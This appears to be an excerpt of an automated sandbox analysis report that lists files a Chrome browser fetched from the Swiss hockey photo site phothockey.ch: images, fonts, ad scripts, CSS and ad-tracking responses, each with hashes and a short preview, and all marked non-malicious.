                                                                                                                                            SHA-512:5383A609E3F0D67E3C310327ECF32F799A45B867571EA9AD8C87CE870314212241422E80E86AC54FB2796A6D5BDCB1F6111925CD8BAF3A22F4E911A797F34932
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:800/h:445/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2022/05/4Y0A4858.jpg
                                                                                                                                            Preview:RIFFn...WEBPVP8X..............VP8 .....U...* ...>.F.K%..,..{....M..0.~......P.P......L...ez.u.Q..!.'._..w..x..w}..../../.....:+..........j...c.a...3...N...~.?j.m....~.{..........o.........>.......c......._..y.........................x.......1.?..v=.?...>h.2.3.o.........^.?.._.....f......[._...y.......?....9....._...>......_......_.....z.7....K_Y...a.'....\oI..~.&.m.o'.r..`....Zn.;d=...:....4ZJ....9...~l.[...,.....1T."7tt*.L....g..n.......K.....I.$...$...K..*..S..#l.(..$...Ek.U_.e{gu.J}..........M...U..kk......._w....Y.....G;....\..j.4......=...M.M..Vwg.>.}..!......D,.W....R0.*..P...L.p^F..:..e.I..+j)c..S......o.dKp..).s.). .../|.To.s.M._.../..-..~8.........a......._!..,g,w.K..Ps.....LS...7..O.9..e....'..Z..h...@.,.#@&.o....M)..yl.0...)b../...A5E. ...u.[......R.~..}c.........K..<g..}....{.f.@..Y...U.k.X..f....pG.jWr.40.K7.YK.W..o..}h..B.!.d..onY..x.....)....j.(.{.....l.R.K9.....s.S../........-J....?...H.)...4...8cvRL.......`....4&.N.../J]
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3083)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):16000
                                                                                                                                            Entropy (8bit):5.496666646952107
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:AF8BB3A01D1257281856D15F50E57A2C
                                                                                                                                            SHA1:BFD69188583B254A26AB65D973C1F98E6F9E6D6D
                                                                                                                                            SHA-256:40A4B33F75E3F736C246F5ECE1AEAFFE7BCD33BC15EC087B4708BA389DF2D86C
                                                                                                                                            SHA-512:2E9631E60F9B8227D2867994D8882E0636565191195CC11ECA8D0DBC642CC6631DF320BBA38C48D86F2A8A315D66DB660E78A086CAFB10749D1E1428E3172B0A
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://tpc.googlesyndication.com/pagead/js/r20241212/r20110914/elements/html/fullscreen_api_adapter_fy2021.js
                                                                                                                                            Preview:(function(){'use strict';var aa=Object.defineProperty;function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ca=ba(this); .function da(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-1;d++){var f=a[d];if(!(f in c))break a;c=c[f]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&aa(c,a,{configurable:!0,writable:!0,value:b})}}da("Symbol.dispose",function(a){return a?a:Symbol("Symbol.dispose")});/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var m=this||self;var q,r;a:{for(var ea=["CLOSURE_FLAGS"],t=m,u=0;u<ea.length;u++)if(t=t[ea[u]],t==null){r=null;break a}r=t}var fa=r&&r[610401301];q=fa!=null?fa:!1;var y;const ha=m.navigator;y=ha?ha.userAgentData||null:null;function z(a){return q?y?y.brands.some(({brand:b})=>b&&b.indexOf(a)!=-1):!
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 18536, version 1.0
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):18536
                                                                                                                                            Entropy (8bit):7.986571198050597
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:8EFF0B8045FD1959E117F85654AE7770
                                                                                                                                            SHA1:227FEE13CEB7C410B5C0BB8000258B6643CB6255
                                                                                                                                            SHA-256:89978E658E840B927DDDB5CB3A835C7D8526ECE79933BD9F3096B301FE1A8571
                                                                                                                                            SHA-512:2E4FB65CAAB06F02E341E9BA4FB217D682338881DABA3518A0DF8DF724E0496E1AF613DB8E2F65B42B9E82703BA58916B5F5ABB68C807C78A88577030A6C2058
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu4mxK.woff2
                                                                                                                                            Preview:wOF2......Hh..........H..............................Z..|.`..J.T..<.....H..U..Z...x.6.$..0. ..t. ..I....p.0.VU.......1....AQ...d..x.....R..4.-.c..C$fUc.c..IX..@..~g.xs.....%...O...eJ.w..U.|.......%*..{.......U+..T#.S......`.n.....V.w.4..~P"..zk.%..../........=3...F.........V.FL..;Bc.........A.Uk.U1.b!Y.BH.DL...s.s...F.m.9a..GJ..1..#.`*m5..DI..X5#.........B.Akm.....&..0...{.L.....G......-(.......O4.@3....=......f..l...$.....j..NO...e.Y.tJ2J>F.(.c....08..e...~....D2S7s:.G'Gm........!.7.........r.c.`,.....~.).......c>1.......Y.g2^...T-1.7./r./....>...g.ov@u.?.U.+._...'M..,.,g....!g..9."..yBF.#r+.Ps...%.d=....U...5.b.$:`.4R.II.<A....Q)....e...k.....M.8.z....+.....5}..F........F.d._...].~-](.Lf....Y..W....;-z...;. .@x._v../.%UIm....=s...P.C....G...^..Q.!g.!b._.P....at..?.}....t.z...O(..Y6..R.2.X....k.R..K.gw(.F.K?m..R*...7....dj..7. .r.U..be.4......8.].w.B..B......Y..:..8.N..U...NEm...\.^q..f}.......{..6.". ...y-.Y...N.*+.M E..`......R.$T
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (430), with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):430
                                                                                                                                            Entropy (8bit):5.352324546844481
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:3DA3FEB2A89CD7CBFFAA5E443C9CA73E
                                                                                                                                            SHA1:8823F7852A9C7E7C8D9FC293FCD3F9B6FB0B36D8
                                                                                                                                            SHA-256:F94EC49F30E297EBE0D931274AE9180AB69DBBE24EC0A81CC7270619DA8F6032
                                                                                                                                            SHA-512:0C9492D26AB290F8C6E5427E5F54314719669CB28C31D68511AF0BC51BC1BFD685D217BBF0D0EBC665CA38AB1BE10301F0DD42E004A2E7DF07B59E6972B4C844
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://googleads.g.doubleclick.net/pagead/ads?gdpr=0&client=ca-pub-5534394335622311&output=html&h=280&adk=3581611690&adf=4003291295&pi=t.aa~a.1329385220~rp.1&w=1140&abgtt=6&fwrn=4&fwrnh=100&lmt=1736177827&rafmt=1&to=qs&pwprc=9468878717&format=1140x280&url=https%3A%2F%2Fphothockey.ch%2F&fwr=0&pra=3&rpe=1&resp_fmts=3&wgl=1&fa=40&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0.&dt=1736177825828&bpp=1&bdt=5129&idt=-M&shv=r20241212&mjsv=m202412090101&ptt=9&saldr=aa&abxe=1&cookie=ID%3D271b0c5861eb301c%3AT%3D1736177771%3ART%3D1736177771%3AS%3DALNI_MbbkKdxZ3r4oXe0CAZ1aXtk3TXpXw&gpic=UID%3D00000fa80f72307c%3AT%3D1736177771%3ART%3D1736177771%3AS%3DALNI_MYYYAF9Bdmqy81LoPXnol1uur86yA&eo_id_str=ID%3Dcfbf4971db1f6709%3AT%3D1736177771%3ART%3D1736177771%3AS%3DAA-AfjaNDk_NqCEVnmF5j0CX-A32&prev_fmts=0x0%2C1200x280&nras=3&correlator=3048303595490&frm=20&pv=1&u_tz=-300&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&dmc=8&adx=70&ady=672&biw=1280&bih=907&scr_x=0&scr_y=0&eid=31088580%2C95344789%2C95347433&oid=2&pvsid=3658152886269661&tmod=1523322118&uas=0&nvt=2&fc=1920&brdim=0%2C0%2C0%2C0%2C1280%2C0%2C1280%2C984%2C1280%2C907&vis=1&rsz=%7C%7Cs%7C&abl=NS&cms=2&fu=128&bc=31&bz=1&td=1&tdf=0&psd=W251bGwsbnVsbCxudWxsLDNd&nt=1&ifi=3&uci=a!3&fsb=1&dtd=1263
                                                                                                                                            Preview:<!DOCTYPE html><html><head><script>window.top.postMessage('{"msg_type":"resize-me","key_value":[{"key":"r_nh","value":"0"},{"key":"r_ifr","value":"true"},{"key":"qid","value":"CKnDhra24YoDFbVwFQgdMFgmNg"}],"googMsgType":"sth"}', '*');</script><script>window.top.postMessage('{"msg_type":"adsense-labs","key_value":[{"key":"settings","value":"[\\\"ca-pub-5534394335622311\\\"]"}],"googMsgType":"sth"}', '*');</script></head></html>
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (430), with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):430
                                                                                                                                            Entropy (8bit):5.376263816375481
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:80C4BD44F97494B5706CA0D1154D8F80
                                                                                                                                            SHA1:046F252525A2AA63B4D2DB8140F5EC53C1CF9A5D
                                                                                                                                            SHA-256:89AB7F11858E1E18E3DB2BB24152793D83DC862287C3161CB43E23F5718A2EB4
                                                                                                                                            SHA-512:56BE2C6F0387AF7330EC11A9331920B4F2D38A4E54B78DACB3C6E36A28918B3A86D512E9FD0B9408AFC77D42C0F5DEBADA0267CBA1F7053A34A739BA602264CC
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://googleads.g.doubleclick.net/pagead/ads?gdpr=0&client=ca-pub-5534394335622311&output=html&h=280&adk=3590780828&adf=759816243&pi=t.aa~a.3103638501~rp.1&w=1140&abgtt=6&fwrn=4&fwrnh=100&lmt=1736177827&rafmt=1&to=qs&pwprc=9468878717&format=1140x280&url=https%3A%2F%2Fphothockey.ch%2F&fwr=0&pra=3&rpe=1&resp_fmts=3&wgl=1&fa=40&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0.&dt=1736177825828&bpp=1&bdt=5128&idt=-M&shv=r20241212&mjsv=m202412090101&ptt=9&saldr=aa&abxe=1&cookie=ID%3D271b0c5861eb301c%3AT%3D1736177771%3ART%3D1736177771%3AS%3DALNI_MbbkKdxZ3r4oXe0CAZ1aXtk3TXpXw&gpic=UID%3D00000fa80f72307c%3AT%3D1736177771%3ART%3D1736177771%3AS%3DALNI_MYYYAF9Bdmqy81LoPXnol1uur86yA&eo_id_str=ID%3Dcfbf4971db1f6709%3AT%3D1736177771%3ART%3D1736177771%3AS%3DAA-AfjaNDk_NqCEVnmF5j0CX-A32&prev_fmts=0x0%2C1200x280%2C1140x280&nras=4&correlator=3048303595490&frm=20&pv=1&u_tz=-300&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&dmc=8&adx=70&ady=1550&biw=1280&bih=907&scr_x=0&scr_y=0&eid=31088580%2C95344789%2C95347433&oid=2&pvsid=3658152886269661&tmod=1523322118&uas=0&nvt=2&fc=1920&brdim=0%2C0%2C0%2C0%2C1280%2C0%2C1280%2C984%2C1280%2C907&vis=1&rsz=%7C%7Cs%7C&abl=NS&fu=128&bc=31&bz=1&td=1&tdf=0&psd=W251bGwsbnVsbCxudWxsLDNd&nt=1&ifi=4&uci=a!4&btvi=1&fsb=1&dtd=1311
                                                                                                                                            Preview:<!DOCTYPE html><html><head><script>window.top.postMessage('{"msg_type":"resize-me","key_value":[{"key":"r_nh","value":"0"},{"key":"r_ifr","value":"true"},{"key":"qid","value":"CNrAiLa24YoDFRnUEQgd-icVrQ"}],"googMsgType":"sth"}', '*');</script><script>window.top.postMessage('{"msg_type":"adsense-labs","key_value":[{"key":"settings","value":"[\\\"ca-pub-5534394335622311\\\"]"}],"googMsgType":"sth"}', '*');</script></head></html>
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (430), with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):430
                                                                                                                                            Entropy (8bit):5.415084182436087
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:A08C07AE7D87DF782EB1519D929D0DD3
                                                                                                                                            SHA1:7D5AED29E05EF3FB6CCD0658423995DF8F18897A
                                                                                                                                            SHA-256:1778D25B848BF386435B1B74A71A9717172E03C2BB2DEADE8D69892791CF0441
                                                                                                                                            SHA-512:B53980999F8EB87276F74E97A72197F6B21A020D299E9F141EDADACF9A03C9F4630BF7D116777C2A0201A0481E47D41E3B9C988653AF85C90AB322A0ABED092C
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://googleads.g.doubleclick.net/pagead/ads?gdpr=0&client=ca-pub-5534394335622311&output=html&h=280&adk=2098703246&adf=3859366563&pi=t.aa~a.3140028793~rp.1&w=358&abgtt=6&fwrn=4&fwrnh=100&lmt=1736177827&rafmt=1&to=qs&pwprc=9468878717&format=358x280&url=https%3A%2F%2Fphothockey.ch%2F&fwr=0&pra=3&rpe=1&resp_fmts=3&wgl=1&fa=40&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0.&dt=1736177825828&bpp=1&bdt=5128&idt=-M&shv=r20241212&mjsv=m202412090101&ptt=9&saldr=aa&abxe=1&cookie=ID%3D271b0c5861eb301c%3AT%3D1736177771%3ART%3D1736177771%3AS%3DALNI_MbbkKdxZ3r4oXe0CAZ1aXtk3TXpXw&gpic=UID%3D00000fa80f72307c%3AT%3D1736177771%3ART%3D1736177771%3AS%3DALNI_MYYYAF9Bdmqy81LoPXnol1uur86yA&eo_id_str=ID%3Dcfbf4971db1f6709%3AT%3D1736177771%3ART%3D1736177771%3AS%3DAA-AfjaNDk_NqCEVnmF5j0CX-A32&prev_fmts=0x0%2C1200x280%2C1140x280%2C1140x280%2C1140x280&nras=6&correlator=3048303595490&frm=20&pv=1&u_tz=-300&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&dmc=8&adx=851&ady=3693&biw=1280&bih=907&scr_x=0&scr_y=0&eid=31088580%2C95344789%2C95347433&oid=2&pvsid=3658152886269661&tmod=1523322118&uas=0&nvt=2&fc=1920&brdim=0%2C0%2C0%2C0%2C1280%2C0%2C1280%2C984%2C1280%2C907&vis=1&rsz=%7C%7Cs%7C&abl=NS&fu=128&bc=31&bz=1&td=1&tdf=0&psd=W251bGwsbnVsbCxudWxsLDNd&nt=1&ifi=6&uci=a!6&btvi=3&fsb=1&dtd=1433
                                                                                                                                            Preview:<!DOCTYPE html><html><head><script>window.top.postMessage('{"msg_type":"resize-me","key_value":[{"key":"r_nh","value":"0"},{"key":"r_ifr","value":"true"},{"key":"qid","value":"CJfnj7a24YoDFRVUFQgd86Ek8A"}],"googMsgType":"sth"}', '*');</script><script>window.top.postMessage('{"msg_type":"adsense-labs","key_value":[{"key":"settings","value":"[\\\"ca-pub-5534394335622311\\\"]"}],"googMsgType":"sth"}', '*');</script></head></html>
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 300x250, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):12436
                                                                                                                                            Entropy (8bit):7.945653624064018
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:8C18ADAB4B7BD0C0F6858EAED6BC407F
                                                                                                                                            SHA1:5F3E117AFD0CDD89788318F21C272D3BBC8954C9
                                                                                                                                            SHA-256:90AA71914819AF383404B0288C63124BCD18F599F5F0E1F96CF17A4B934E84A9
                                                                                                                                            SHA-512:00C8DB20028693E84CA0D8D68CEE424D11CAF46178C313D10634528D130EE88597528FB880831ECD3BC2812ECA5FEAC0E6CE7801986CCB5DE22658979DB7BF22
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................,......................C...............................!..!..)1(%(1)I9339ITGCGTf[[f.z.......C...............................!..!..)1(%(1)I9339ITGCGTf[[f.z............,.."..................................................................................p.....\....W=.a.Z. .x"A...iBd.P.F.*a%..IB..P..>._..s....YM.Q.As.~..Uc.[.U=..r.W....P...io.[ZMFf.d..N..$......A D.J.(..4.R.(T.J\.e..sn..x3.....K..[^.Hk9....<..4\\.B..c............!.zK$/&...".zG.F1...rFI..w.|g+4..Z_(.{.w..~......7}..o....G}...g8..>./.....<FA}.F....N..`..to..'..'....o|...._..?c.V...]q.....*A....j;z...0P^~.[...3s..4^an1.........-.....O........d_..I].._..M.v.....6....jN....i....i=.*xn.......w?.n.....f..|....(..?.F...\.;..4.k....<.<:.,..f.b.4...cK\.x.......+.Y.ul...+."ad...rU..)./...V..k.-/..DrC6..).b..A;73.ak.t.....n..&..5s....
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JSON data
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):635
                                                                                                                                            Entropy (8bit):4.911267048438164
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:EAF14BFB3E64FD7E35249D693AC50289
                                                                                                                                            SHA1:C4DE64E26259C960BA888088B5154606C4C4471C
                                                                                                                                            SHA-256:7B5681F1F088325F7324E93E25CEA5EEF679B4C889DD32F8B9867C39FA90A68B
                                                                                                                                            SHA-512:3AA9B6B36A8865873A270341FB5787D48E919A63A5564AFF2CAE67465B7C899D3889DF899BF778E6546064A6F3FEFA930954B1C159F6DB3F605CF6315E26095A
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:"https://pixel.adsafeprotected.com/services/pub?anId=930694&slot=%7Bid:myFakeSlot,ss:%5B0.0%5D,p:myFakeSlot,t:display%7D&slot=%7Bid:div-ad-gds-3961-1_1,ss:%5B728.90,994.560,994.500,994.250,994.233%5D,p:fr-phothockey.ch/div-ad-gds-3961-1,t:display%7D&slot=%7Bid:div-ad-gds-3961-2,ss:%5B300.600%5D,p:fr-phothockey.ch/div-ad-gds-3961-2,t:display%7D&slot=%7Bid:div-ad-gds-3961-3,ss:%5B300.250%5D,p:fr-phothockey.ch/div-ad-gds-3961-3,t:display%7D&slot=%7Bid:div-ad-gds-3961-1_2,ss:%5B728.90,994.560,994.500,994.250,994.233%5D,p:fr-phothockey.ch/div-ad-gds-3961-1,t:display%7D&slot=%7Bid:div-ad-gds-3961-1,ss:%5B728.90,994.560,994.500,994.250,994.233%5D,p:fr-phothockey.ch/div-ad-gds-3961-1,t:display%7D&wr=1280.907&sr=1280.1024&sessionId=776039bb-0d77-8bcf-a574-246b9e1f5ade&url=https%253A%252F%252Fphothockey.ch%252F"
                                                                                                                                            Preview:{"fr":"false","brandSafety":{"adt":"veryLow","alc":"veryLow","dlm":"veryLow","drg":"veryLow","hat":"veryLow","off":"veryLow","vio":"veryLow"},"slots":{"myFakeSlot":{"id":"f8393b90-cc43-11ef-817a-e21087fd37d0"},"div-ad-gds-3961-3":{"id":"f8393b93-cc43-11ef-817a-e21087fd37d0"},"div-ad-gds-3961-1":{"id":"f8393b95-cc43-11ef-817a-e21087fd37d0"},"div-ad-gds-3961-2":{"id":"f8393b92-cc43-11ef-817a-e21087fd37d0"},"div-ad-gds-3961-1_2":{"id":"f8393b94-cc43-11ef-817a-e21087fd37d0"},"div-ad-gds-3961-1_1":{"id":"f8393b91-cc43-11ef-817a-e21087fd37d0"}},"custom":{"ias-kw":["IAS_3007987_PG","IAS_1510294_PG","IAS_3010460_PG","IAS_3010248_PG"]}}
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 18588, version 1.0
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):18588
                                                                                                                                            Entropy (8bit):7.988601596032928
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:115C2D84727B41DA5E9B4394887A8C40
                                                                                                                                            SHA1:44F495A7F32620E51ACCA2E78F7E0615CB305781
                                                                                                                                            SHA-256:AE0E442895406E9922237108496C2CD60F4947649A826463E2DA9860B5C25DD6
                                                                                                                                            SHA-512:00402945111722B041F317B082B7103BCC470C2112D86847EAC44674053FC0642C5DF72015DCB57C65C4FFABB7B03ECE7E5F889190F09A45CEF1F3E35F830F45
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmEU9fBBc4.woff2
                                                                                                                                            Preview:wOF2......H........ ..H8................................|.`..J.\..<........-..Z...x.6.$..0. .... ..S.7.5..K!.;..../.`..Sn.J.e.52P.(.....=9....f.....$...*.fZ.p...N...t....6.lfS.Ju.i.o.g..<....T"O.o..4..4....M/N.>.K..."[.P...W.u.>]................A.9z....IN^....z..Y.{....m=...+X9<?.......(IA*G8rD....52L0.p .EJ..p....=.......[U...pz..g...../L.U.......P..W.U..q$L..6......C.M.0..R..........D(.ilX.Y..SZ.R...Q..j.6.@\."|.l......3....,.T.....L...ap0......6.j.\&O.z`*.$.*_+vwnr...,....?W.T....!.J...L#%.......A}........\.....l...:....U..u.J.0....O......&.!.)4.V..:.}.0f....:W......?U.....%...b...!....yA.sw.....5..T .}{.t!F.G....{"..pQ.S.v.S....t......U.Y|.v.@....|..(..V.........^....../.7......K......J.Uq/L.T-.`.O........;........';vWq.+....J...J..p.....sB`(1LC.k....?Z{...v>dS....F..........\.....UetU........6.V...vE....._.../...%.q...^.l...>^.z..l..p....j..@H...`X.p...KQ. .<@...I...BF.......L..6...y.2=.P....8;..@`.m.....R.B.L.r.*T.T..l@.6.Y....}g.....F.n...
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):10833
                                                                                                                                            Entropy (8bit):4.411624228261749
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:3AC5B9BF86994A0FBE71E68721CAC540
                                                                                                                                            SHA1:EFB42A23B817B197CB38FB2F9F42BB3B48B5F545
                                                                                                                                            SHA-256:D4B64DA2687F53B4930A2C619426ACAB23EFBC6C29BB99748F87982EB66A50B5
                                                                                                                                            SHA-512:1D61CEE25860F38545E3CD87B5EFB80E112963AE8B19BA54342BC4A80F04C01514A86AA8D29FFF50BECB38DC4D37D52CEAF197792A56A48F8D17E4367E91AB65
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://gbucket.ch/scripts/totm/v1/totmGBucket.js
                                                                                                                                            Preview://totmGBucket....// return topmost browser window of current window & boolean to say if cross-domain exception occurred..var getClosestTop = function(){.. var oFrame = window,.. bException = false;.... try {.. while (oFrame.parent.document !== oFrame.document) {.. if (oFrame.parent.document) {.. oFrame = oFrame.parent;.. } else {.. //chrome/ff set exception here.. bException = true;.. break;.. }.. }.. } catch(e){.. // Safari needs try/catch so sets exception here.. bException = true;.. }.... return {.. 'topFrame': oFrame,.. 'err': bException.. };..};....var myTop = getClosestTop().topFrame;..var totmConnect;....myTop.TotmConnect = function(data){.. if(!totmConnect){.. totmConnect = this;.. this.init(data);.. }else{.. return totmConnect;.. }..}....myTop.IframeStetcher = function(data){.. this.ini
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (1493), with CRLF line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):1719
                                                                                                                                            Entropy (8bit):5.110438079170738
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:9C1C642AAA4C8A7DA5D076D4432A19F5
                                                                                                                                            SHA1:DFDA239BCE28B13D3ED42E19FEA52C6A0907E5B2
                                                                                                                                            SHA-256:E0EFE600BDA0FE9780161F5766500209E66A82BF1C99814BA1037CE984E63177
                                                                                                                                            SHA-512:8E61B9D433B5911591A64D1B7B43E41FCE0E8AB308C0185E564E88C930FCFBE6CD2AE060D499E5818D71B640A1A01FA7264AA9EDE1208294DD9274799AE3ABBE
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/themes/colormag-pro/assets/library/font-awesome/css/v4-font-face.min.css?ver=6.5.2
                                                                                                                                            Preview:/*!.. * Font Awesome Free 6.5.2 by @fontawesome - https://fontawesome.com.. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License).. * Copyright 2024 Fonticons, Inc... */..@font-face{font-family:"FontAwesome";font-display:block;src:url(../fonts/fa-solid-900.woff2) format("woff2"),url(../fonts/fa-solid-900.ttf) format("truetype")}@font-face{font-family:"FontAwesome";font-display:block;src:url(../fonts/fa-brands-400.woff2) format("woff2"),url(../fonts/fa-brands-400.ttf) format("truetype")}@font-face{font-family:"FontAwesome";font-display:block;src:url(../fonts/fa-regular-400.woff2) format("woff2"),url(../fonts/fa-regular-400.ttf) format("truetype");unicode-range:u+f003,u+f006,u+f014,u+f016-f017,u+f01a-f01b,u+f01d,u+f022,u+f03e,u+f044,u+f046,u+f05c-f05d,u+f06e,u+f070,u+f087-f088,u+f08a,u+f094,u+f096-f097,u+f09d,u+f0a0,u+f0a2,u+f0a4-f0a7,u+f0c5,u+f0c7,u+f0e5-f0e6,u+f0eb,u+f0f6-f0f8,u+f10c,u+f114-f115,u+f118-f11a,u+f11c-f11d,u+f133,u+f147,
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (49237)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):49376
                                                                                                                                            Entropy (8bit):4.967018037989151
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:30D759FAADA8D974DE8BE2AF571FD92B
                                                                                                                                            SHA1:BB15405D7C8E4319C280EE77054663829AD88BA1
                                                                                                                                            SHA-256:98A98B04BDE4DF9C07085BBE0F9CF1EB807463B6501CB4404D0D1C9016B45CAD
                                                                                                                                            SHA-512:8454DBA79E6684CB7992D070C2FB633538C9419927DE4A5C43E1D5D96B4C2B67A3FBD6C5757A42A200B6A0E28DAE485A1A85503D53CE9512C71803BA0CCB2627
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/plugins/formidable/css/formidableforms.css?ver=12102220
                                                                                                                                            Preview:/* AVERTISSEMENT : Toutes modifications apport.es . ce fichier seront perdues lorsque vos r.glages de Formidable seront mis . jour. */..with_frm_style{--form-width:100%;--form-align:left;--direction:ltr;--fieldset:0px;--fieldset-color:#000000;--fieldset-padding:0 0 15px 0;--fieldset-bg-color:transparent;--title-size:20px;--title-color:#444444;--title-margin-top:10px;--title-margin-bottom:10px;--form-desc-size:14px;--form-desc-color:#666666;--form-desc-margin-top:10px;--form-desc-margin-bottom:25px;--form-desc-padding:0px;--font:"Lucida Grande","Lucida Sans Unicode",Tahoma,sans-serif;--font-size:14px;--label-color:#444444;--weight:bold;--position:none;--align:left;--width:150px;--required-color:#B94A48;--required-weight:bold;--label-padding:0 0 3px 0;--description-font-size:12px;--description-color:#666666;--description-weight:normal;--description-style:normal;--description-align:left;--description-margin:0;--field-font-size:14px;--field-height:32px;--line-height:32px;--field-width:
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):10634
                                                                                                                                            Entropy (8bit):7.964546628917454
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:78350E86386FB6D4639B8DCA9818314B
